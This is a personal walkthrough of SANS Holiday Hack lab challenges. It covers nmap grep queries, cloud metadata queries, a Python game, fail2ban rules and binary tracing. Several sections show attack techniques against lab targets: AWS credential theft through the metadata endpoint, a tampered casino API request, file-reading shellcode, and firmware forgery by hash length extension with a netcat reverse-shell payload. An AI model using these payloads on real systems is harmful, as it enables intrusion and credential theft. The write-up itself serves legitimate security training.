SANS Holiday Hack

Some of the cranberrypi’s and challenges all mixed in!

Grep Challenge:

Howdy howdy!  Mind helping me with this homew- er, challenge?
Someone ran nmap -oG on a big network and produced this bigscan.gnmap file.
The quizme program has the questions and hints and, incidentally,
has NOTHING to do with an Elf University assignment. Thanks!

Answer all the questions in the quizme executable:
- What port does 34.76.1.22 have open?
- What port does 34.77.207.226 have open?
- How many hosts appear "Up" in the scan?
- How many hosts have a web port open?  (Let's just use TCP ports 80, 443, and 8080)
- How many hosts with status Up have no (detected) open TCP ports?
- What's the greatest number of TCP ports any one host has open?

Check out bigscan.gnmap and type quizme to answer each question.

output >

elf@1206be8c579e:~$ cat bigscan.gnmap |grep "34.76.1.22"
Host: 34.76.1.22 ()     Status: Up
Host: 34.76.1.22 ()     Ports: 62078/open/tcp//iphone-sync///      Ignored State: closed (999)
elf@1206be8c579e:~$ quizme
What port does 34.76.1.22 have open?
Please enter your answer or press h for a hint: 62078
That's correct!
We used this as a solution:
grep 34.76.1.22 bigscan.gnmap
This looks for "34.76.1.22" in the bigscan.gnmap file and shows us every place where it shows up.  In the results, we see:
  62078/open/tcp//iphone-sync///
This tells us port TCP 62078 was found open by nmap.
You have 5 challenges left.
elf@1206be8c579e:~$ 
elf@1206be8c579e:~$ cat bigscan.gnmap |grep "34.77.207.226"  
Host: 34.77.207.226 ()     Status: Up
Host: 34.77.207.226 ()     Ports: 8080/open/tcp//http-proxy///      Ignored State: filtered (999)
elf@1206be8c579e:~$ quizme
What port does 34.77.207.226 have open?
Please enter your answer or press h for a hint: 8080
That's correct!
We used this as a solution:
grep 34.77.207.226 bigscan.gnmap
Like the previous challenge, this searches the nmap output file for a specific IP address.  In the output, we see TCP port 8080 is open:
  8080/open/tcp//http-proxy///
You have 4 challenges left.
elf@1206be8c579e:~$ cat bigscan.gnmap |grep "Up"|wc -l     
26054
elf@1206be8c579e:~$ quizme
How many hosts appear "Up" in the scan?
Please enter your answer or press h for a hint: 26054
That's correct!
We used this as a solution:
grep Up bigscan.gnmap | wc -l
Running the grep part of the command returns every line with "Up" in it, and wc counts the bytes, characters, words, and lines that come out of grep. Using "-l" only shows lines.
You have 3 challenges left.
elf@1206be8c579e:~$ cat bigscan.gnmap |grep -E "(80|443|8080)/open"|wc -l
14372
elf@1206be8c579e:~$ quizme
How many hosts have a web port open?  (Let's just use TCP ports 80, 443, and 8080)
Please enter your answer or press h for a hint: 14372
That's correct!
We used this as a solution:
grep -E "(80|443|8080)/open" bigscan.gnmap | wc -l
Using "-E" tells grep we"re giving it a regular expression (regex).  In this case, that regex says, "I want lines that have 8080/open, 443/open, or 80/open."
  If you want to be MORE correct, you might use "(\s8080|\s443|\s80)/open" to ensure you don't snag ports like 50080, but there weren't any in this file.
You have 2 challenges left.
elf@1206be8c579e:~$ echo $((`grep -e "Up" bigscan.gnmap |wc -l` - `grep -e "/open/" bigscan.gnmap|wc -l`))
402
elf@1206be8c579e:~$ quizme
How many hosts with status Up have no (detected) open TCP ports?
Please enter your answer or press h for a hint: 402
That's correct!
We used this as a solution:
echo $((`grep Up bigscan.gnmap | wc -l` - `grep Ports bigscan.gnmap | wc -l`))
Our solution is a little fancy, but the crux is this: use one grep|wc command to count how many hosts are "Up", and use another to count how many have "Ports" open.
You have 1 challenge left.
elf@1206be8c579e:~$ cat bigscan.gnmap |grep -E "(open.*){12,}"|wc -l
5
elf@1206be8c579e:~$ cat bigscan.gnmap |grep -E "(open.*){13,}"|wc -l
0
elf@1206be8c579e:~$ quizme
What's the greatest number of TCP ports any one host has open?
Please enter your answer or press h for a hint: 12  
That's correct!
We used this as a solution:
grep -E "(open.*){12,}" bigscan.gnmap | wc -l && grep -E "(open.*){13,}" bigscan.gnmap | wc -l
In our solution, we count how many lines have "open" in them a number of times.  We get a few for 12 and none for 13.
One crafty tester employed the mighty powers of awk like this:
  awk 'BEGIN {print}{print gsub(/open/,"") ""}' bigscan.gnmap | sort -nr | head -1
You've done it!



Wifi Challenge

Turn up the heat to defrost the entrance to Frost Tower. Click on the Items tab in your badge to find a link to the Wifi Dongle’s CLI interface. Talk to Greasy Gopherguts outside the tower for tips

elf@a3968fa3d847:~$ iwlist wlan0 scanning
wlan0     Scan completed :
          Cell 01 - Address: 02:4A:46:68:69:21
                    Frequency:5.2 GHz (Channel 40)
                    Quality=48/70  Signal level=-62 dBm  
                    Encryption key:off
                    Bit Rates:400 Mb/s
                    ESSID:"FROST-Nidus-Setup"
elf@a3968fa3d847:~$ iwconfig wlan0 essid FROST-Nidus-Setup
** New network connection to Nidus Thermostat detected! Visit http://nidus-setup:8080/ to complete setup
(The setup is compatible with the 'curl' utility)
elf@a3968fa3d847:~$ curl http://nidus-setup:8080
◈──────────────────────────────────────────────────────────────────────────────◈

Nidus Thermostat Setup

◈──────────────────────────────────────────────────────────────────────────────◈

WARNING Your Nidus Thermostat is not currently configured! Access to this
device is restricted until you register your thermostat » /register. Once you
have completed registration, the device will be fully activated.

In the meantime, Due to North Pole Health and Safety regulations
42 N.P.H.S 2600(h)(0) - frostbite protection, you may adjust the temperature.

API

The API for your Nidus Thermostat is located at http://nidus-setup:8080/apidoc
elf@b5b1ec182993:~$ curl http://nidus-setup:8080/apidoc
◈──────────────────────────────────────────────────────────────────────────────◈

Nidus Thermostat API

◈──────────────────────────────────────────────────────────────────────────────◈

The API endpoints are accessed via:

http://nidus-setup:8080/api/<endpoint>

Utilize a GET request to query information; for example, you can check the
temperatures set on your cooler with:

curl -XGET http://nidus-setup:8080/api/cooler

Utilize a POST request with a JSON payload to configuration information; for
example, you can change the temperature on your cooler using:

curl -XPOST -H 'Content-Type: application/json' \
  --data-binary '{"temperature": 0}' \
  http://nidus-setup:8080/api/cooler


● WARNING: DO NOT SET THE TEMPERATURE ABOVE 0! That might melt important furniture

Available endpoints

┌─────────────────────────────┬────────────────────────────────┐
│ Path                        │ Available without registering? │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/cooler                 │ Yes                            │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/hot-ice-tank           │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/snow-shower            │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/melted-ice-maker       │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/frozen-cocoa-dispenser │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/toilet-seat-cooler     │ No                             │ 
├─────────────────────────────┼────────────────────────────────┤
│ /api/server-room-warmer     │ No                             │ 
└─────────────────────────────┴────────────────────────────────┘
elf@b5b1ec182993:~$ curl -XPOST -H 'Content-Type: application/json' \
  --data-binary '{"temperature": 0}' \
  http://nidus-setup:8080/api/cooler
{
  "temperature": 0.98,
  "humidity": 87.26,
  "wind": 6.27,
  "windchill": -1.0,
  "WARNING": "ICE MELT DETECTED!"
}

elf@b5b1ec182993:~$ 



Challenge: IMDS

This pi challenge was neat for the SSRF challenge… taught the basic commands

elfu@7d794547eef9:~$ ping 169.254.169.254
PING 169.254.169.254 (169.254.169.254) 56(84) bytes of data.
64 bytes from 169.254.169.254: icmp_seq=1 ttl=64 time=0.019 ms
64 bytes from 169.254.169.254: icmp_seq=2 ttl=64 time=0.022 ms
64 bytes from 169.254.169.254: icmp_seq=3 ttl=64 time=0.040 ms
^C
--- 169.254.169.254 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2028ms
rtt min/avg/max/mdev = 0.019/0.027/0.040/0.009 ms
elfu@7d794547eef9:~$ next
elfu@7d794547eef9:~$ curl http://169.254.169.254
latest
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest
dynamic
meta-data
elfu@7d794547eef9:~$ ...
       "devpayProductCodes": null,
        "marketplaceProductCodes": null,
        "version": "2017-09-30",
        "privateIp": "10.0.7.10",
        "billingProducts": null,
        "instanceId": "i-1234567890abcdef0",
        "pendingTime": "2021-12-01T07:02:24Z",
        "architecture": "x86_64",
        "instanceType": "m4.xlarge",
        "region": "np-north-1"
}elfu@7d794547eef9:~$ curl http://169.254.169.254/latest/dynamic/instance-identity/document | q
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   451  100   451    0     0   440k      0 --:--:-- --:--:-- --:--:--  440k
{
  "accountId": "PCRVQVHN4S0L4V2TE",
  "imageId": "ami-0b69ea66ff7391e80",
  "availabilityZone": "np-north-1f",
  "ramdiskId": null,
  "kernelId": null,
  "devpayProductCodes": null,
  "marketplaceProductCodes": null,
  "version": "2017-09-30",
  "privateIp": "10.0.7.10",
  "billingProducts": null,
  "instanceId": "i-1234567890abcdef0",
  "pendingTime": "2021-12-01T07:02:24Z",
  "architecture": "x86_64",
  "instanceType": "m4.xlarge",
  "region": "np-north-1"
}
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest/meta-data
.....<snip>
network/interfaces/macs/0e:49:61:0f:c3:11/ipv6s
network/interfaces/macs/0e:49:61:0f:c3:11/local-hostname
network/interfaces/macs/0e:49:61:0f:c3:11/local-ipv4s
network/interfaces/macs/0e:49:61:0f:c3:11/mac
network/interfaces/macs/0e:49:61:0f:c3:11/owner-id
network/interfaces/macs/0e:49:61:0f:c3:11/public-hostname
network/interfaces/macs/0e:49:61:0f:c3:11/public-ipv4s
network/interfaces/macs/0e:49:61:0f:c3:11/security-group-ids
network/interfaces/macs/0e:49:61:0f:c3:11/security-groups
network/interfaces/macs/0e:49:61:0f:c3:11/subnet-id
network/interfaces/macs/0e:49:61:0f:c3:11/subnet-ipv4-cidr-block
network/interfaces/macs/0e:49:61:0f:c3:11/subnet-ipv6-cidr-blocks
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-id
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-ipv4-cidr-block
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-ipv4-cidr-blocks
network/interfaces/macs/0e:49:61:0f:c3:11/vpc-ipv6-cidr-blocks
placement/availability-zone
placement/availability-zone-id
placement/group-name
placement/host-id
placement/partition-number
placement/region
product-codes
public-hostname
public-ipv4
public-keys/0/openssh-key
reservation-id
security-groups
services/domain
services/partition
spot/instance-action
spot/termination-time
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest/meta-data
elfu@7d794547eef9:~$ curl http://169.254.169.254/latest/meta-data/public-hostname
ec2-192-0-2-54.compute-1.amazonaws.comelfu@7d794547eef9:~$ curl http://169.254.169.254/latest/meta-data/public-hostname; echo
ec2-192-0-2-54.compute-1.amazonaws.com
elfu@7d794547eef9:~$ 
elfu@55e39f6fa4da:~$ curl http://169.254.169.254/latest/meta-data/iam/securityoelfu-deploy-role 
elfu@55e39f6fa4da:~$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/elfu-deploy-role
{
        "Code": "Success",
        "LastUpdated": "2021-12-02T18:50:40Z",
        "Type": "AWS-HMAC",
        "AccessKeyId": "AKIA5HMBSK1SYXYTOXX6",
        "SecretAccessKey": "CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX",
        "Token": "NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==",
        "Expiration": "2026-12-02T18:50:40Z"
elfu@55e39f6fa4da:~$ cat gettoken.sh 
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"`
elfu@55e39f6fa4da:~$ source gettoken.sh 
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    44  100    44    0     0  44000      0 --:--:-- --:--:-- --:--:-- 44000
elfu@55e39f6fa4da:~$ echo $TOKEN
Uv38ByGCZU8WP18PmmIdcpVmx00QA3xNe7sEB9Hixkk=
elfu@55e39f6fa4da:~$ curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/placement/region
🍬🍬🍬🍬Congratulations!🍬🍬🍬🍬
You've completed the lesson on Instance Metadata interaction. Run 'exit' to close.

Challenge: Elf game

I really enjoyed this challenge, it was fun.

level 2
import elf, munchkins, levers, lollipops, yeeters, pits
# Gets all lollipops as a list
all_lollipops = lollipops.get()
# Can set lollipop1 using:
lollipop1 = all_lollipops[1]
lollipop0 = lollipops.get(0)
elf.moveTo(lollipop1.position)
elf.moveTo(lollipop0.position)
elf.moveLeft(3)
elf.moveUp(99)

level 3
Objective
Move the elf to collect the lollipops and get to the KringleCon entrance.

Hint
You can walk past the Yeeter once you complete lever0's task and lever0.pull(modified_data) in the desired way to disable to Yeeter trap.
Click on the lever 0 object in the CURRENT LEVEL OBJECTS panel for more information.
import elf, munchkins, levers, lollipops, yeeters, pits
lever0 = levers.get(0)
answer = lever0.data() + 2
lollipop0 = lollipops.get(0)
elf.moveTo(lever0.position)
lever0.pull(answer)
elf.moveTo(lollipop0.position)
elf.moveUp(99)

== 
level 4
import elf, munchkins, levers, lollipops, yeeters, pits
# Complete the code below:
lever0, lever1, lever2, lever3, lever4 = levers.get()
# Move onto lever4
elf.moveLeft(2)
# This lever wants a str object:
lever4.pull("A String")
# Need more code below:
elf.moveTo(lever3.position)
lever3.pull(True)
elf.moveTo(lever2.position)
lever2.pull(1.5)
elf.moveTo(lever1.position)
lever1.pull([1,2,3])
elf.moveTo(lever0.position)
lever0.pull({"good":"times"})
elf.moveUp(99)

== level 5

import elf, munchkins, levers, lollipops, yeeters, pits
# Fix/Complete Code below
lever0, lever1, lever2, lever3, lever4 = levers.get()
elf.moveTo(lever4.position)
string = lever4.data() + " concatenate"
lever4.pull(string)
elf.moveTo(lever3.position)
boolval = not lever3.data()
lever3.pull(boolval)
elf.moveTo(lever2.position)
adding = lever2.data() + 1
lever2.pull(adding)
elf.moveTo(lever1.position)
thelist = lever1.data()
thelist.append(1)
lever1.pull(thelist)
elf.moveTo(lever0.position)
thedict = lever0.data()
thedict["strkey"] = "strvalue"
lever0.pull(thedict)
elf.moveUp(99)

== level 6
Objective
Move the elf to the lever. Get the lever data lever.data() and perform the appropriate action to the data. Submit the modified data using lever.pull(modified_data).

Hints
This level requires the use of operators to compare and modify data. This link on operators should help.

Data types will also need to be checked using conditionals in if, elif, else statements. This link on conditionals should help.

You will also need to use conditionals to check data types. This link on types should help.

For example, if you want to check the type of a variable, you could use:

if type(var) == str:
    print("Its a string!")

 Objective

Calling lever.data() will return a boolean, a number, a list of integers, a string, or a dict with "a" and an integer to you. For a boolean, return the inverse. For a number, return double the number. For a list of integers, return that list with each integer incremented by 1. For a string, return the string concatenated with itself. For a dict, return the dict with a's value + 1. Submit this response using lever.pull(conditional_answer) .

Note

If you submit a correct answer to lever.pull(answer), then the lever and its corresponding trap will be disabled.

In order to run lever.pull(answer) with lever (#0), you must be standing in its grid square located at (x:2,y:4).

This particular lever object can be saved to a variable named lever using lever = levers.get(0)   

import elf, munchkins, levers, lollipops, yeeters, pits
# Fix/Complete the below code
lever = levers.get(0)
data = lever.data()
if type(data) == bool:
    data = not data
elif type(data) == int:
    data = data * 2 
elif type(data) == str:
    data = data + data
elif type(data) == list:
    data = [x + 1 for x in data]
elif type(data) == dict:
    data["a"] += 1    
    
elf.moveTo(lever.position)
lever.pull(data)
elf.moveUp(99)
#lever.something

===== level 7
Objective
Navigate through the obstacles and collect the lollipop before arriving at the KringleCon entrance.

Hints
Using a for loop can reduce how many lines and/or object function calls are used. This link on for loops may be helpful.

Using elf.moveLeft(40) will move your elf as far as possible before hitting an obstacle or the end of the screen. Use however large a number you think you need!

import elf, munchkins, levers, lollipops, yeeters, pits
for num in range(5): #not sure if number is right
    elf.moveLeft(3)
    elf.moveUp(11)
    elf.moveLeft(3)
    elf.moveDown(11)

===== level 8
import elf, munchkins, levers, lollipops, yeeters, pits
all_lollipops = lollipops.get()
for lollipop in all_lollipops:
    elf.moveTo(lollipop.position)
lever = levers.get(0)
data = lever.data()
elf.moveTo(lever.position)
data.insert(0,"munchkins rule")
lever.pull(data)
elf.moveDown(3)
elf.moveLeft(6)
elf.moveUp(99)

Challenge: Kotton Kandy Co

Fix the regisration.json

================================================================================

Please, we need your help! The cotton candy machine is broken!

We replaced the SD card in the Cranberry Pi that controls it and reinstalled the
software. Now it's complaining that it can't find a registration file!

Perhaps you could figure out what the cotton candy software is looking for...

================================================================================

So bruteforced my way to victory

kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0
puts("Unable to open configuration fil"...Unable to open configuration file.
)               = 35
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ touch registration.json
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x560aaa75d260
getline(0x7ffdb8b6e560, 0x7ffdb8b6e568, 0x560aaa75d260, 0x7ffdb8b6e568) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ strace ./make_the_candy 
execve("./make_the_candy", ["./make_the_candy"], 0x7ffe6dfd97c0 /* 12 vars */) = 0
brk(NULL)                               = 0x55d9d8831000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=19540, ...}) = 0
mmap(NULL, 19540, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff21617b000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\20\35\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030928, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff216179000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff215b66000
mprotect(0x7ff215d4d000, 2097152, PROT_NONE) = 0
mmap(0x7ff215f4d000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7ff215f4d000
mmap(0x7ff215f53000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff215f53000
close(3)                                = 0
arch_prctl(ARCH_SET_FS, 0x7ff21617a4c0) = 0
mprotect(0x7ff215f4d000, 16384, PROT_READ) = 0
mprotect(0x55d9d6ff0000, 4096, PROT_READ) = 0
mprotect(0x7ff216180000, 4096, PROT_READ) = 0
munmap(0x7ff21617b000, 19540)           = 0
brk(NULL)                               = 0x55d9d8831000
brk(0x55d9d8852000)                     = 0x55d9d8852000
openat(AT_FDCWD, "registration.json", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=0, ...}) = 0
read(3, "", 4096)                       = 0
fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
write(1, "Unregistered - Exiting.\n", 24Unregistered - Exiting.
) = 24
exit_group(1)                           = ?
+++ exited with 1 +++
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x55a65b2c1260
getline(0x7fff4cb38f00, 0x7fff4cb38f08, 0x55a65b2c1260, 0x7fff4cb38f08) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x55d5cb1ae260
getline(0x7fff310b6850, 0x7fff310b6858, 0x55d5cb1ae260, 0x7fff310b6858) = 11
strstr("registered\n", "Registration")                    = nil
getline(0x7fff310b6850, 0x7fff310b6858, 0x55d5cb1ae260, 0x7fff310b6858) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x562f3ed62260
getline(0x7ffff7508130, 0x7ffff7508138, 0x562f3ed62260, 0x7ffff7508138) = 13
strstr("Registration\n", "Registration")                  = "Registration\n"
strchr("Registration\n", ':')                             = nil
getline(0x7ffff7508130, 0x7ffff7508138, 0x562f3ed62260, 0x7ffff7508138) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x55a8cd2b2260
getline(0x7ffe1b8c0970, 0x7ffe1b8c0978, 0x55a8cd2b2260, 0x7ffe1b8c0978) = 16
strstr(""Registration":\n", "Registration")               = "Registration":\n"
strchr("Registration":\n", ':')                           = ":\n"
strstr(":\n", "True")                                     = nil
getline(0x7ffe1b8c0970, 0x7ffe1b8c0978, 0x55a8cd2b2260, 0x7ffe1b8c0978) = -1
puts("Unregistered - Exiting."Unregistered - Exiting.
)                           = 24
+++ exited (status 1) +++
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ vim registration.json 
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x556fdb0a6260
getline(0x7ffc581db7f0, 0x7ffc581db7f8, 0x556fdb0a6260, 0x7ffc581db7f8) = 22
strstr(""Registration" : True\n", "Registration")         = "Registration" : True\n"
strchr("Registration" : True\n", ':')                     = ": True\n"
strstr(": True\n", "True")                                = "True\n"
getline(0x7ffc581db7f0, 0x7ffc581db7f8, 0x556fdb0a6260, 0x7ffc581db7f8) = -1
system("/bin/initialize_cotton_candy_sys"...


Launching...

     *                              *
      *                            *
       *                          *
        *                        *
         *                      *
          *                    *
           *                  *
            *                *
             *              *
              *            *
               *          *
                *        *
                 *      *
                  *    *
                   *  *
                    **
                    **
                   *  *
                  *    *
                 *      *
                *        *
               *          *
              *            *
             *              *
            *                *
           *                  *
          *                    *
         *                      *
        *                        *
       *                          *
      *                            *
                    <snip>
     *                              *
     *                              *
     *                              *
     *                              *
      *                            *
       *                          *
        *                        *
         *                      *
          *                    *
           *                  *
            *                *
             *              *
              *            *
               *          *
                *        *
                 *      *
                  *    *
                   *  *
                    **
         Candy making in progress


 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                    = 0
fclose(0x556fdb0a6260)                                    = 0
+++ exited (status 0) +++
kotton_kandy_co@f670ba8280ff:~$ ltrace ./make_the_candy 
fopen("registration.json", "r")                           = 0x5561ac2ab260
getline(0x7ffdb3455f20, 0x7ffdb3455f28, 0x5561ac2ab260, 0x7ffdb3455f28) = 22
strstr(""Registration" : True\n", "Registration")         = "Registration" : True\n"
strchr("Registration" : True\n", ':')                     = ": True\n"
strstr(": True\n", "True")                                = "True\n"
getline(0x7ffdb3455f20, 0x7ffdb3455f28, 0x5561ac2ab260, 0x7ffdb3455f28) = -1
system("/bin/initialize_cotton_candy_sys"...

registration.json
"Registration" : True



Challenge: Slot machine

Noticed that sending a negative value for numline rewarded positive money

POST /api/v1/02b05459-0d09-4881-8811-9a2a7e28fd45/spin HTTP/2
Host: slots.jackfrosttower.com
Cookie: XSRF-TOKEN=eyJpdiI6InFUVVhZelcybzAzc3BIT1g0Ui9MVHc9PSIsInZhbHVlIjoiditjTUJTZXFBZWxleWJlcmpqNUZvSGppNktpSHg2RFQ2M0EwWXBUdklkeExQZ0tDejdIenBNellxRE50ZGI2WGNKWTN5SjdzU2xvWWhxV1pNT3BicFB4amtXUE43MU9VdkJVcXhkMTg5MUh1c0E5NW1OUlZ5b3hZQy9ZZXcvakkiLCJtYWMiOiJjZTFkNGNhNWJhMWVhNTE5NTQ5ODYwZTVkNGQ1OTUzMTlkOGVlMjZjM2M4ODY0NGI4YzZjMWUzYTMwYTczZTNlIiwidGFnIjoiIn0%3D; slots_session=eyJpdiI6Ik9Dbnd1MWdQcHYxd3FkeHNzcS9KZGc9PSIsInZhbHVlIjoiRVh1S3ZVTTJ1SmhDd1ZUc0xTQW9xOTUwM3JocVdPRTc0THIwMUd4TnVac2hWRzdEVzMxS3Z2SVZvbkZWNElMUnZYb1MwTitzTTFoWUROcUFHMEhISkNzZldTNndXT0Rha1VrM2lpa1dha3Z1azhRRmF1NURJZHdlNExMcVZWdWkiLCJtYWMiOiI1YWIxM2U4Yzk0M2RlZjdjYTBiNzgzZThhYmZmMDBmZTQ4OWNmMTJhMzM1MjFkNzIwMmJhOTk3YzFjMjBiMGM4IiwidGFnIjoiIn0%3D
Content-Length: 36
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
Accept: application/json
Sec-Ch-Ua-Mobile: ?0
X-Ncash-Token: 44688b52-1e7d-4551-af97-8b19db6e445b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: application/x-www-form-urlencoded
Origin: https://slots.jackfrosttower.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://slots.jackfrosttower.com/uploads/games/frostyslots-206983/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

betamount=100&numline=-10000&cpl=0.5
== output

HTTP/2 200 OK
Date: Fri, 17 Dec 2021 22:41:29 GMT
Date: Fri, 17 Dec 2021 22:41:29 GMT
X-Powered-By: PHP/7.4.26
Cache-Control: no-cache, private
Content-Type: application/json
X-Ratelimit-Limit: 60
X-Ratelimit-Remaining: 59
Access-Control-Allow-Origin: *
Via: 1.1 google
Alt-Svc: clear

{"success":true,"data":{"credit":575073.75,"jackpot":0,"free_spin":0,"free_num":0,"scaler":0,"num_line":-10000,"bet_amount":100,"pull":{"WinAmount":0,"FreeSpin":0,"WildFixedIcons":[],"HasJackpot":false,"HasScatter":false,"WildColumIcon":"","ScatterPrize":0,"SlotIcons":["icon2","scatter","scatter","icon3","icon7","icon6","icon5","icon7","scatter","icon6","scatter","icon9","wild","icon5","icon4"],"ActiveIcons":[],"ActiveLines":[]},"response":"I'm going to have some bouncer trolls bounce you right out of this casino!"},"message":"Spin success"



Challenge: #hohono

I struggled with this one for a bit learning fail2ban syntax…got it finally here is what i had

#filter
[Definition]

failregex = ^ Login from rejected due to unknown user name$
^ Failed login from for
^ sent a malformed request$
^ Invalid heartbeat ('.*') from $

ignoredregex= Login from successful$
: Request completed successfully$
Valid heartbeat from $

#jail
[naughty]
enabled = true
filter = naughty
logpath = /var/log/hohono.log
action = naughty
maxretry = 10
findtime = 1h
bantime = 1h

#action
[Definition]
actionstart =
actionstop =
actioncheck = /root/naughtylist list
actionban = /root/naughtylist add
actionunban = /root/naughtylist del



Challenge: Shellcode Primer

helpful resources

Solution:

; TODO: Get a reference to this
call hello_world
db '/var/northpolesecrets.txt',0
hello_world:
pop rdi 
mov rsi, 0
mov rdx, 0
mov rax, 2
syscall

; read file
push rax            ; push file descriptor onto stack
sub rsp, 200        ; reserve 16 bytes of memory

xor     rax, rax    ; "read"
mov     rdi, [rsp+200] ; file descriptor
mov     rsi, rsp    ; address of buffer
mov     rdx, 200     ; size of buffer
 syscall

; TODO: Call sys_write to write the contents from rsp to stdout (1)
pop rax
mov rax, 1
mov rdi, 1
mov rax, 1
mov rdx, 200
syscall

; TODO: Call sys_exit
mov rax, 60
mov rdi, 0
syscall

challenge output:
Stdout
Secret to KringleCon success: all of our speakers and organizers, providing the gift of cyber security knowledge, free to the community.



Challenge: Printer exploitation

This challenge was unique, thanks again Ron!


Create file you want to execute, which may just be a batch file sending what you want to the designated output directory
Zip new file
Run hash extender script with the original firmware zip as the file and the concatenated zip files as the append.
Put output of script into new JSON file formatted like the original JSON we downloaded from server 
Upload new JSON file  

└─$ git clone https://github.com/iagox86/hash_extender.git

use hash_extended with the firmware.bin, zip it up (payload) and extend it to the downloaded existing zip (test.zip)

└─$ ./hash_extender --secret=16 --file=test.zip --appendfile=payload.zip --signature 2bab052bf894ea1a255886fde202f451476faba7b941439df629fdeb1ff0dc97 --format sha256

└─$ ls
firmware.bin  payload.zip
                                                                                      
└─$ cat firmware.bin 
#!/bin/bash
nc -e /bin/sh <ip> 9191
  
firmware.json
